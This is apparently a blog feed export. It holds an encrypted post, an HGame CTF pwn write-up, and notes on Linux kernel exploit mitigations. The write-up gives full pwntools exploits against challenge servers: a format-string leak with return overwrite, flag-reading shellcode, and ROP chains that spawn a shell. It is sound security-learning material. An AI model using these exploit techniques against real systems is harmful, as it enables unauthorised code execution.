cbff697ce6a5195e6128e3eb7d661e7e584246b427ef33607bbfe312deffe2b10b6e96e603f8ce54d0f329b8a69e3dd8965189aab4a38f3cf9d986d3633b983787313c1b95b5ded2c8ec4402e8b1bb476d587b4d52def6716ff43efdd8ba14071163a0a9b9bf99af161fcd5c46e5b382501a3b07a9e407c1bfc53947f07455d0e92aeb89cc1c3becb3ed0905fa718eda282ae3140e2ae708337bde934b812cd0208b42435c9b24eb2e65c714d4c4a2dfd7b65bf46839e8120021493a886fb05068e6761fb49844921e77071d187f0691204c3808302122f71048db34462e7364408b8a0fa1cfb4af8a345f031b2cbadd3566eaec08d531d4368076b9ad70c06896c89818a520fdf82320f91870fd3b0de0875906c6d5e30aee7d786ee63e4444759e9d25a3fabae7638b7acd91e0352a4d3045d2d43674d6d3b9873e954f9cb94af485979839c6a6411d6613a263d69f6a4cec4b0f670581028882b7d092b64141a0f36f1ebb86765358534bb34f6520f3c65d53e42656852565370868b1ca954f9f766efdc430713ec2d17e7dc813729299baf5c81dd059cadf0b92999cabc4aa52076e83c1926ce69dfb1357405fcd935302b220e364a5b6126c582ba65eca917f218d079731b3705bb384fcde53b178af9777a1cf70b32ed8206babcdc72b7c827e0fdba3ed1f6fcfda40ef3271a05370d10f3f02751bad2219ef802f56c522852408e752b2373c56a3acdd0cad1151593ea7aa95e9673b0b46662e538643127d35d44b97f0e2529f5a8f4340be37dcb0b4ff8c6d573ad0f122e35890bc8da49348ebda9713077ce27677407987a52295fb2297cb054448bb9af8683201f1e6fc9947324503e17d0d1186346d57c546f9c60e420f5d39e83df287383045a0e7916be21e2895e6519c14dee066f8dd44e6f78541a65ef44797a9656f617cb1a12009bd5021040cb15bb60f1a651c8393e876b16e5f429b197c21d00aa9e6d6139107323c7ab188e0d961750121c258eb772cb3160dfe2b473b5055fa8982b3ced83716b2ae72c1272a7c0bfd249a3d74a05af0933afcea18a73a8483f5dd8d56357f3807d5ba253ea35c2ca5530f4622dc91b280e4f98bac89782b149e51466babce81af241fb98a9b8370b3818572ced60c385388c0e9bf1ce81ea0de87e14bb98229ba43fae3273ccc42e22c0bee38e712eea001707e26aa85928d28dcf2a17d4bb1743cf46fb35a81500c23debdf05efc7e17fb22d88deb92d051b954efca8b1b57488eb1f2f7eceda8b11761e4b5ec92359d3d16c807564aaa87b4b1437785630ed33011d11a21c0e287f702d0e3d1c67a3506a089af6ceb4773546f040ccc997a6a7b54b07d8feb388e1cd66f32b0eab4488974d686cc35832c04b4e306388f0b7c4fd9f8
e8d22ab7267a861b06d6b01f880542334b3b9074fa29fc83223e07b383310247365b88b4b6510b54e620e559263cd9f8aaa24adabf9559893a0e8e6a98d484837549d03f2200fafb439ab6e4956f9a2cad7a385c6a4db85b022e14c0f0a015f06f09b27ce9fc7c88b83908d55f7fed29c32fefe04f7b68217359fe5b9db7949ac9103d1f69b51f07b8d03c89a8b0653271ce46b8edc7bdd648276ee45f6fa0d6ed24a95804d0b3a19bd580e611f7d0e3d810c19ebc36371788fd36af928159b6e7f3c7f21277ae01436784fa374a3eff2d57bcea74929c85aa3501f04c441621620ca5d67c691be961982f5d70b7c6d92d718c3a291f9985ca6292899e9c7b428c3047744e073fbb48d82aef38aea117e05471e71a5f964929541b456b9bdc19affb533ea59032ae36947945982eaf6110d035641fcd0f2c4941952ede4cd79ff188963b807a8941505ac3a8fcaa2ce8af5fd6f0fce59759632dc806191fb6c3c112cfbde561c4796338fc3e781a4273011cd57319168b4a6a7e031aab3373253d073a40c904dfb57eaed50bc1e7d9c940abdcd5e6c5c3d670115622b93a021ec7dae379651d889d64f2be99c81be82520c770b83398009969b28d5378eaf0c3e7ddb25e11683f00fc7056ff70c6ca54cc468f7447248fe3cc1e04a052ec4a54135ebbf592b3745433b06fd72b9890b6344d0fdad042ce24c23c9aead0e7333dbed4093bcb1ab1fb10ec7c0871d3419e780b7900a25df38f488d326c9f4ad4017a4fbf215bda986ad3c18d48b639a57a4a1b594102395c38c570ecb30245dae9733d3816325804e6b58def5dc8e2ead5bcaa6d09dc708e6b7009940533e9ff92a3b6ae15c07ed761e477b2cc6057addd04302b9678495249758baf85336f2950218fd952c71b166687457dd45ce323619d0425fb5fd1542eab5e6e623928a34a925c502c4e89ad9a9129f4acf4eb7491d6e184d1c30abc4a0465834b7f831dab537d0e86303f99cb4ca48aedb2ca7bd55f9f2d7e2b312a4c518446d823f855878c8e3834cfaa132be6ae51b38c00f9c7b5f56dd1dc9393ac78d4e5e201cd5664ebded2010320e751b579a2e73ba7b1eb1835f8d00d558931b01abaec70e870b3f52e70c10028529f4eda42b2c3a0fcf9e1853e1e02e156af6a53ce2e1238fd380021bceb1481e113ba198e0c97cb1fef1b3c5b4fbf1c6b62e7f9b648d7200038785600e2b6d5dc3e11a1caa613949e6542c469305b5a7cd577229873fa3d3030f6949b53519cea1c95ce23273af47fe546664ee79c97b804dc7151d3824ab3f3162cb96a3d98a61ea6ca0fb99b508d156d4d4d8951e441cad890f3db35fb3791720161e7d7bbe1c778358f5d7767af6502d29a5be971dabb874ecd7dd2372b7e1e5a765a14bc7de1
5a2122d949ab61b5b08c8c21783016e29361ff42a32af761196a01f472e64d87e0749a963a0e7a30e8260fd01396265d3f87923df74f8d81aaecec9779c0cf6797c46fbc9144f1ee147d392957e1574c8115596fb0bee3af02db6e019156d8d8436a95bef6ef07010b990c6938922be02e04c7b5450faf954ecdc134b6a2bdfa1425f4e11992f545f2b3ab8b9ace10892cabc4b0cefc1375d94afcd761be6574063caeee4922ecdefeb5b492fd3b6f98512364b430f724e25b1d7293b23b51a12fd8d6e38b03f8390393f367b3d8e51bb29743a4e8568cd9135f27cfc0c9024daf96b7c16260a62c11434c98900c61ce4931472ec387aef90ca024e0a84b351c6046944749315e737430736f96f6df70cce909587ea1f563bc26e19c5c191c2b5d59e2c9803b86d5d72c77a7522590953d49bf1c0dc52f947c04b3793fcd596298ead19d4b36889b9ffccececac60488d0c85beb56aa36379033bc2da50fcc7f37d5fbb83b5f26070efe2dc57aec714cd5a2686481ffaca454a70f3cad96b01ccc1d1adcf54591aead0dcd09f13c64ebc3305e5cf449696924fc297e812dbe8f7b16324c5fd3a385f01c17e3544255750ff523d01b81fa7db63cdf96527288a2548823145da362a91a359e0c641d5650cd3e341352f4c9049f0caa5e3f805a7d96b8bf76d577a88fb59f31025c2c0628b0aab92d0f95f0ed27a798cc4014a7e2bb5baf788eeae1cd6b7ae2ff1e1fe720ac71af8f6384e12f97306aecf953d94aa1a8fea2af9ed681174738aab7d793a84be4af5c18d3b6964747986d96cac0adb2b01a6cfa6fe8131488c110906a70fd997fbffdf22cb1a26c68e3096b688cc70b4d74415e70820e6c962affea2f28cd17ee6d3047e68e4b3a8dc59f78b21ca6d4eef9f1081126f87198f48d5bb8c1df49ebac87d88091bf65a06ae25255527b21626ff4318c93768b5221a7d9b7855c3a8ad032007070292fa362edea5f750ab9308f4cc52e836a3f9ed07</script>
<div class="hbe hbe-content">
<div class="hbe hbe-input hbe-input-default">
<input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
<label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
<span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>
</label>
</div>
</div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
<categories>
<category>Notes</category>
</categories>
</entry>
<entry>
<title>HGame</title>
<url>/article/HGame/</url>
<content><![CDATA[<h1 id="week1"><a href="#week1" class="headerlink" title="week1"></a>week1</h1><span id="more"></span>
<h2 id="once-格式化字符串"><a href="#once-格式化字符串" class="headerlink" title="once (format string)"></a>once (format string)</h2><p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210306191440.png" alt="20210306191440"></p>
<p>In IDA it is clearly a format string vulnerability, and clearly one meant for leaking addresses: leak a libc address, compute the one_gadget address from it, and finally overwrite the return address so that the function returns into the one_gadget and we get a shell.</p>
<p>This cannot be done in one pass, though; it takes two steps. The first use of the bug leaks the address and overwrites the return address so that execution returns to where the vulnerability begins (here, the program's vuln function); the second use overwrites the return address with the one_gadget.</p>
<p>The key point in the first step is that address randomization never changes the lowest 12 bits, so overwriting only the lowest byte is enough to return to a nearby location, such as the start of the vuln function.</p>
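<p>Added example (not from the writeup): a small Python helper that checks the leak arithmetic described above. It parses what <code>%13$p</code> printed, rejects a libc base that is not page-aligned (the usual sign of a wrong stack slot or a mismatched libc build), and shows why the one-byte overwrite survives ASLR: the low 12 bits of an address inside a page-aligned mapping never change. The <code>__libc_start_main</code> symbol offset and the image offsets in it are constructed sample values; only the <code>0xe7</code> return offset is taken from the writeup.</p>

```python
"""Added example (not part of the original writeup): sanity checks for the
libc-leak and partial-overwrite arithmetic used in the `once` solution.
All addresses and offsets below are constructed sample values."""
import random

PAGE_SIZE = 0x1000


def parse_leak(line):
    """Parse what `%13$p` printed (e.g. b'0x7f0000021b97\\n') into an int.

    glibc prints a NULL pointer as '(nil)', which is not a usable leak, so
    that case is reported instead of silently becoming 0.
    """
    if isinstance(line, bytes):
        line = line.decode()
    text = line.strip()
    if text == "(nil)" or not text.startswith("0x"):
        raise ValueError(f"no pointer in leaked line: {text!r}")
    return int(text, 16)


def libc_base_from_leak(leaked, libc_start_main_off, ret_off=0xE7):
    """Recover the libc base from the saved return address into __libc_start_main.

    The writeup's slot 13 holds __libc_start_main+0xe7 (where main returns to
    in libc-2.27), so base = leak - symbol offset - 0xe7. A mapping base is
    always page-aligned; anything else means the wrong slot, wrong libc build
    or wrong return offset was used, and a one_gadget computed from it is junk.
    """
    base = leaked - libc_start_main_off - ret_off
    if base & (PAGE_SIZE - 1):
        raise ValueError(f"libc base {base:#x} is not page-aligned")
    return base


def low12_bits_seen(image_off, n_bases=200, seed=0):
    """Return the set of low-12-bit values of image_off across many random
    page-aligned load bases. Because every base is a multiple of 0x1000 the
    set has exactly one element: ASLR never touches those bits."""
    rng = random.Random(seed)
    bases = [rng.randrange(0x555555000000, 0x7FFF00000000, PAGE_SIZE)
             for _ in range(n_bases)]
    return {(base + image_off) & 0xFFF for base in bases}


def partial_overwrite_byte(image_off, n_bases=200):
    """The single byte written over the saved return address so it points at
    image_off. Only valid when the saved return address and the target differ
    in their lowest byte alone; the stability check documents why the byte
    itself does not depend on the randomized base."""
    seen = low12_bits_seen(image_off, n_bases)
    if len(seen) != 1:
        raise RuntimeError("low bits vary with the base; partial overwrite unsafe")
    return image_off & 0xFF


if __name__ == "__main__":
    # Constructed sample: leak printed by '%13$p' and a libc-2.27-style symbol offset.
    base = libc_base_from_leak(parse_leak(b"0x7f0000021b97\n"), 0x21AB0)
    print(f"libc base {base:#x}")
    # Constructed image offset whose low byte is 0xd3, the byte the writeup writes.
    print(f"overwrite byte {partial_overwrite_byte(0x9D3):#04x}")
```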
<p>I kept failing to find the format string offset accurately with the [tag] method:</p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210306191649.png" alt="20210306191649"></p>
<p>When I wanted to find the addresses of some functions on the stack to compute the offset, I didn't know, after breaking at printf, which argument the first value on the stack was, so I used IDA to find it.</p>
<p>test_exp:</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.terminal = [<span class="string">'gnome-terminal'</span>, <span class="string">'-x'</span>, <span class="string">'zsh'</span>, <span class="string">'-c'</span>]</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'AAAA'</span> + <span class="string">'%1$p'</span> +<span class="string">'%2$p'</span> + <span class="string">'%3$p'</span> +<span class="string">'%4$p'</span> + <span class="string">'%5$p'</span> + <span class="string">'%6$p'</span> + <span class="string">'%13$p'</span> + <span class="string">'%14$p'</span></span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">'It is your turn: '</span>,payload)</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210307140046.png" alt="20210307140046"></p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210307140246.png" alt="20210307140246"></p>
<p>We can see that the 13th argument is an address inside __libc_start_main; from this address and the libc file provided with the challenge, the one_gadget address can be computed.</p>
<p>The +0x4f3d5 in the final getshell comes from the one_gadget [libcname] command.</p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210308133927.png" alt="20210308133927"></p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.terminal = [<span class="string">'gnome-terminal'</span>, <span class="string">'-x'</span>, <span class="string">'zsh'</span>, <span class="string">'-c'</span>]</span><br><span class="line">context.log_level = <span class="string">'info'</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'182.92.108.71'</span>,<span class="number">30107</span>)</span><br><span class="line"><span class="comment">#p = process('./once')</span></span><br><span class="line"><span class="comment">#p = remote('127.0.0.1',12345)</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'./libc-2.27.so'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line">binary = ELF(<span class="string">'./once'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line"><span class="comment"># Stage 1: leak stack argument 13 (the return address into __libc_start_main)</span></span><br><span class="line"><span class="comment"># and overwrite only the low byte of the saved return address so vuln runs again</span></span><br><span class="line">payload = <span class="string">'%13$p\n'</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x28</span>,<span class="string">'a'</span>)</span><br><span class="line">payload += <span class="string">'\xD3'</span></span><br><span class="line">p.sendafter(<span class="string">'It is your turn: '</span>,payload)</span><br><span class="line"></span><br><span class="line">libc_addr = p.recvuntil(<span class="string">'\n'</span>,<span class="literal">True</span>)  <span class="comment"># drop=True strips the trailing newline</span></span><br><span class="line">libc_addr = <span class="built_in">int</span>(libc_addr,<span class="number">16</span>)</span><br><span class="line">libc_base = libc_addr - libc.symbols[<span class="string">'__libc_start_main'</span>] - <span class="number">0xe7</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">'libc_base'</span>,<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line"><span class="comment"># Stage 2: back in vuln, overwrite the whole return address with the one_gadget</span></span><br><span class="line">getshell = <span class="string">'a'</span> *<span class="number">0x28</span></span><br><span class="line">getshell += p64(libc_base + <span class="number">0x4f3d5</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'It is your turn: '</span>)</span><br><span class="line">p.sendline(getshell)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="letter(没搞懂"><a href="#letter(没搞懂" class="headerlink" title="letter (not fully understood)"></a>letter (not fully understood)</h2><p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210307191837.png" alt="20210307191837"></p>
<p>The program disables some system calls, so we cannot get a shell directly with ready-made shellcode, i.e. asm(shellcraft.sh()); the shellcode has to be hand-written in assembly. Because the program is 64-bit, we need context.arch = 'amd64'.</p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210307194929.png" alt="20210307194929"></p>
<p>Negative overflow, but what I haven't figured out is why it is -268376833.... I'm really puzzled.</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"><span class="comment">#r = process('./letter')</span></span><br><span class="line">r=remote(<span class="string">'182.92.108.71'</span>,<span class="number">31305</span>)</span><br><span class="line">r.sendlineafter(<span class="string">'?'</span>,<span class="string">'-268376833'</span>)</span><br><span class="line"><span class="comment">#r.sendline('a'*0x18+p64(0x60105c)+asm(shellcraft.sh()))</span></span><br><span class="line">shellcode = <span class="string">'''</span></span><br><span class="line"><span class="string">mov rax, 0x101010101010101</span></span><br><span class="line"><span class="string">push rax</span></span><br><span class="line"><span class="string">mov rax, 0x101010101010101 ^ 0x67616c66</span></span><br><span class="line"><span class="string">xor [rsp], rax</span></span><br><span class="line"><span class="string">mov rdi, rsp</span></span><br><span class="line"><span class="string">xor rsi, rsi</span></span><br><span class="line"><span class="string">xor rdx, rdx</span></span><br><span class="line"><span class="string">mov rax, 2</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">xor rax, rax</span></span><br><span class="line"><span class="string">mov rdi, 3</span></span><br><span class="line"><span class="string">mov rsi, 0x601070</span></span><br><span class="line"><span class="string">mov rdx, 0x100</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">mov rax, 1</span></span><br><span class="line"><span class="string">mov rdi, 1</span></span><br><span 
class="line"><span class="string">mov rsi, 0x601070</span></span><br><span class="line"><span class="string">mov rdx,0x100</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">r.sendline(<span class="string">'a'</span>*<span class="number">0x18</span>+p64(<span class="number">0x60108C</span>)+asm(shellcode))</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>I found that other players have a different solution.</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./letter'</span>)</span><br><span class="line">context.arch = elf.arch</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pr</span>(<span class="params">a,addr</span>):</span></span><br><span class="line"> log.success(a+<span class="string">'====>'</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line">write_plt = elf.plt[<span class="string">'write'</span>]</span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">read_got = elf.got[<span class="string">'read'</span>]</span><br><span class="line">prdi = <span class="number">0x400AA3</span></span><br><span class="line">p6 = <span class="number">0x400A9A</span></span><br><span class="line">mmmc = <span class="number">0x400A80</span></span><br><span class="line">vuln = <span class="number">0x400958</span></span><br><span class="line">p = remote(<span class="string">'182.92.108.71'</span>,<span class="number">31305</span>)</span><br><span class="line"><span class="comment">#p = process('./letter')</span></span><br><span class="line"><span class="comment">#gdb.attach(p,'b *0x4009BB')</span></span><br><span class="line">p.sendafter(<span class="string">'?\n'</span>,<span class="built_in">str</span>(<span class="number">0xffffffff</span>).ljust(<span class="number">0x10</span>,<span class="string">'\x00'</span>))</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x18</span>+p64(p6)+p64(<span class="number">0</span>)+p64(<span 
class="number">1</span>)+p64(write_got)+p64(<span class="number">1</span>)+p64(write_got)+p64(<span class="number">8</span>)</span><br><span class="line">payload += p64(mmmc)+<span class="string">'a'</span>*<span class="number">16</span>+p64(<span class="number">0x00601000</span>+<span class="number">0x500</span>+<span class="number">0x10</span>)+<span class="string">'a'</span>*<span class="number">32</span>+p64(<span class="number">0x4009DD</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.recvuntil(<span class="string">'.\n'</span>)</span><br><span class="line">write_leak = u64(p.recv(<span class="number">8</span>))</span><br><span class="line">libcbase = write_leak - libc.sym[<span class="string">'write'</span>]</span><br><span class="line">open_addr = libcbase + libc.sym[<span class="string">'open'</span>]</span><br><span class="line">pr(<span class="string">'libcbase'</span>,libcbase)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x18</span>+p64(<span class="number">0x00601000</span>+<span class="number">0x500</span>+<span class="number">0x10</span>+<span class="number">0x10</span>)+asm(shellcraft.<span class="built_in">open</span>(<span class="string">'flag'</span>))</span><br><span class="line">payload += asm(shellcraft.read(<span class="number">3</span>,<span class="number">0x00601000</span>+<span class="number">0x500</span>+<span class="number">0x100</span>,<span class="number">100</span>))</span><br><span class="line">payload += asm(shellcraft.write(<span class="number">1</span>,<span class="number">0x00601000</span>+<span class="number">0x500</span>+<span class="number">0x100</span>,<span class="number">100</span>))</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>I don't understand why rbp is set to 0x00601000+0x500+0x10....</p>
<h1 id="week2"><a href="#week2" class="headerlink" title="week2"></a>week2</h1><h2 id="rop-primary"><a href="#rop-primary" class="headerlink" title="rop_primary"></a>rop_primary</h2><p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210309195557.png" alt="20210309195557"></p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210309195620.png" alt="20210309195620"></p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210309195630.png" alt="20210309195630"></p>
<p>From the analysis, the program gives two matrices, and we must enter the entries of their product one by one to pass the check function, after which we can use vuln to do ROP.</p>
<p>The first thing tested is Python ability, which of course I'm not very good at....</p>
<p>exp:</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read_matrix</span>():</span></span><br><span class="line"> matrix = []</span><br><span class="line"> <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> line = p.recvuntil(<span class="string">'\n'</span>).strip() </span><br><span class="line"> <span class="keyword">if</span> <span class="string">'\t'</span> <span class="keyword">not</span> <span class="keyword">in</span> line:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> row = []</span><br><span class="line"> <span class="keyword">for</span> num <span class="keyword">in</span> line.split(<span class="string">'\t'</span>):</span><br><span class="line"> row.append(<span class="built_in">int</span>(num))</span><br><span class="line"> <span class="built_in">print</span>(line)</span><br><span class="line"> matrix.append(row)</span><br><span class="line"> <span class="keyword">return</span> matrix</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">multi_matrix</span>(<span class="params">a, b</span>):</span></span><br><span class="line"> rows = <span class="built_in">len</span>(a)</span><br><span class="line"> mid = <span class="built_in">len</span>(b)</span><br><span class="line"> cols = <span class="built_in">len</span>(b[<span class="number">0</span>])</span><br><span class="line"> result = []</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(rows):</span><br><span class="line"> row = []</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(cols):</span><br><span class="line"> num = <span 
class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(mid):</span><br><span class="line"> num += a[i][k] * b[k][j]</span><br><span class="line"> row.append(num)</span><br><span class="line"> result.append(row)</span><br><span class="line"> <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'A:\n'</span>)</span><br><span class="line">a = read_matrix()</span><br><span class="line">b = read_matrix()</span><br><span class="line"></span><br><span class="line">result = multi_matrix(a, b)</span><br></pre></td></tr></table></figure>
<p>After that it is just a simple ROP.</p>
<p>exp:</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line">#coding=utf-8</span><br><span class="line">from pwn import *</span><br><span class="line">#context.terminal = ['gnome-terminal', '-x', 'zsh', '-c']</span><br><span class="line">context.log_level = 'debug'</span><br><span class="line"></span><br><span class="line">p = remote('159.75.104.107',30372)</span><br><span class="line">#p = process('./rop_primary')</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def read_matrix():</span><br><span class="line">    # the service prints each matrix as tab-separated rows; the first line without a tab ends it</span><br><span class="line">    matrix = []</span><br><span class="line">    while True:</span><br><span class="line">        line = p.recvuntil(b'\n').strip()</span><br><span class="line">        if b'\t' not in line:</span><br><span class="line">            break</span><br><span class="line">        row = []</span><br><span class="line">        for num in line.split(b'\t'):</span><br><span class="line">            row.append(int(num))</span><br><span class="line">        print(line)</span><br><span class="line">        matrix.append(row)</span><br><span class="line">    return matrix</span><br><span class="line"></span><br><span class="line">def multi_matrix(a, b):</span><br><span class="line">    # plain matrix product; the answer has to be right before the vulnerable read is reached</span><br><span class="line">    rows = len(a)</span><br><span class="line">    mid = len(b)</span><br><span class="line">    cols = len(b[0])</span><br><span class="line">    result = []</span><br><span class="line">    for i in range(rows):</span><br><span class="line">        row = []</span><br><span class="line">        for j in range(cols):</span><br><span class="line">            num = 0</span><br><span class="line">            for k in range(mid):</span><br><span class="line">                num += a[i][k] * b[k][j]</span><br><span class="line">            row.append(num)</span><br><span class="line">        result.append(row)</span><br><span class="line">    return result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(b'A:\n')</span><br><span class="line">a = read_matrix()</span><br><span class="line">b = read_matrix()</span><br><span class="line"></span><br><span class="line">result = multi_matrix(a, b)</span><br><span class="line"></span><br><span class="line">for row in result:</span><br><span class="line">    for num in row:</span><br><span class="line">        p.sendline(str(num).encode())</span><br><span class="line"></span><br><span class="line">elf = ELF('./rop_primary')</span><br><span class="line">puts_got = elf.got['puts']</span><br><span class="line">puts_plt = elf.plt['puts']</span><br><span class="line"></span><br><span class="line">pop_rdi = 0x0000000000401613       # pop rdi ; ret</span><br><span class="line">pop_rsi_r15 = 0x0000000000401611   # pop rsi ; pop r15 ; ret (not needed for this chain)</span><br><span class="line">vuln_addr = 0x000000000040157B     # re-enter the vulnerable function for a second overflow</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># stage 1: 0x38 bytes up to the saved return address, then puts(puts@got) to leak libc, then back to vuln</span><br><span class="line">payload = b'a'*0x38 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(b'try your best\n')</span><br><span class="line"></span><br><span class="line">puts_addr = u64(p.recv(6).ljust(8,b'\x00'))</span><br><span class="line"></span><br><span class="line">print(hex(puts_addr))</span><br><span class="line"></span><br><span class="line"># offsets of the remote libc (these are the glibc 2.31 values shipped with Ubuntu 20.04)</span><br><span class="line">libc_base = puts_addr - 0x0875a0</span><br><span class="line">system_addr = libc_base + 0x055410</span><br><span class="line">bin_sh = libc_base + 0x1b75aa</span><br><span class="line"></span><br><span class="line">ret_addr = 0x000000000040101a      # lone ret: keeps rsp 16-byte aligned when system() is entered</span><br><span class="line"></span><br><span class="line"># stage 2: system("/bin/sh")</span><br><span class="line">payload = b'a'*0x38 + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>Linux Kernel 0x1</title>
<url>/article/Linux%20Kernel%200x1/</url>
<content><![CDATA[<h1 id="Linux-Kernel-0x1"><a href="#Linux-Kernel-0x1" class="headerlink" title="Linux Kernel 0x1"></a>Linux Kernel 0x1</h1><!-- 文章页 配置 -->
<h1 id="前置知识"><a href="#前置知识" class="headerlink" title="Prerequisites"></a>Prerequisites</h1><h2 id="内核保护"><a href="#内核保护" class="headerlink" title="Kernel protections"></a>Kernel protections</h2><h3 id="SMAP-Supervisor-Mode-Access-Prevention"><a href="#SMAP-Supervisor-Mode-Access-Prevention" class="headerlink" title="SMAP (Supervisor Mode Access Prevention)"></a>SMAP (Supervisor Mode Access Prevention)</h3><p>Supervisor Mode Access Prevention: forbids the kernel from reading or writing user-space pages. With SMAP on, an exploit cannot simply point kernel code at data it placed in its own address space (a fake cred structure, a ROP chain in user memory); the kernel's own copy_from_user/copy_to_user paths remain legal because they set and clear the AC flag with <code>stac</code>/<code>clac</code> around the access.</p>
<h3 id="SMEP-Supervisor-Mode-Execution-Prevention"><a href="#SMEP-Supervisor-Mode-Execution-Prevention" class="headerlink" title="SMEP (Supervisor Mode Execution Prevention)"></a>SMEP (Supervisor Mode Execution Prevention)</h3><p>Supervisor Mode Execution Prevention: forbids executing user-space pages while in ring 0, the kernel-side analogue of user-space NX. It is what stops the classic ret2usr technique of returning from the kernel into a function the exploit placed in user memory.</p>
<p>Note: both can be disabled with <code>nosmap</code> and <code>nosmep</code> on the kernel command line, and whether the guest CPU exposes them at all depends on the qemu <code>-cpu</code> flags (see boot.sh below).</p>
<h3 id="Stack-protector"><a href="#Stack-protector" class="headerlink" title="Stack protector"></a>Stack protector</h3><p>The kernel counterpart of the user-space canary (<code>CONFIG_STACKPROTECTOR</code>): a random value is stored in the stack frame and checked before the function returns, so a linear stack overflow must first leak the canary and write it back in place.</p>
<h3 id="KASLR"><a href="#KASLR" class="headerlink" title="KASLR"></a>KASLR</h3><p>Kernel address space layout randomization, the analogue of user-space ASLR: the kernel is loaded at a randomized base, so addresses taken from vmlinux or System.map are only valid after adding the runtime slide. It is disabled with <code>nokaslr</code> on the kernel command line; when it is on, one leaked kernel text address is enough to recover the base (<code>slide = leaked_address - address_in_vmlinux</code>).</p>
<h3 id="Kernel-Address-Display-Restriction"><a href="#Kernel-Address-Display-Restriction" class="headerlink" title="Kernel Address Display Restriction"></a>Kernel Address Display Restriction</h3><p>Linux kernel exploits commonly escalate privileges by calling commit_creds and prepare_kernel_cred, whose addresses can be read from /proc/kallsyms. Since Ubuntu 11.04 and RHEL 7, /proc/sys/kernel/kptr_restrict defaults to 1 to close this leak: an unprivileged user can still open the file, but every address is shown as <code>0000000000000000</code>; only a process with CAP_SYSLOG (in practice root) sees the real values. A value of 2 hides the addresses from root as well.</p>
